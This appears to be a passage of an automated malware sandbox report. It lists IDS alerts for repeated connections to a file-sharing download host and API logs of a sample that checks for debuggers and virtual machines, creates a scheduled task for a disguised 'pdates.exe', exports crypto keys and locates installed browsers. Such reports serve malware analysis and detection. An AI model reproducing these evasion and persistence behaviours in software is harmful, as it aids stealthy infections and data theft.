TCP 192.168.56.103:49392 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49275 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49225 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49246 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49419 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49445 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49465 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49292 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49365 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49297 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49488 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49265 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49220 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49375 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49237 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49241 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49256 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49287 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49253 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49310 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49271 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49418 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49452 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49490 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49344 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49391 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49285 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49401 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49478 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49206 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49305 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49260 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49431 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49293 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49333 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49282 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49227 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49339 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49386 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49484 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49406 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49251 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49309 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49479 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49261 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49397 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49312 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49199 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49402 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49399 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49357 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49232 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49413 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49453 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49223 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49262 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49314 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49277 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49329 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49358 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49266 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49242 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49486 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (37 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 27, 2023, 10:25 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (15 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 27, 2023, 10:24 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:24 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:24 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:24 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0
IsDebuggerPresent July 27, 2023, 10:25 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 27, 2023, 10:24 a.m.	buffer: SUCCESS: The scheduled task "pdates.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 10:24 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 27, 2023, 10:24 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 27, 2023, 10:24 a.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00575638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00575638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058e6c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058e6c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058e6c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058e6c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00572688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00572688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00572688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00572688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00572688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7660 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7660 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: f ím=®o£c¼sRH¿Ûf*6rð~¼F#HN crypto_handle: 0x0055b968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035bef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035bef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035bef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035bef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035be78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035bf38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035bf38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035c838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035c838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0035c6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b0a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 27, 2023, 10:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

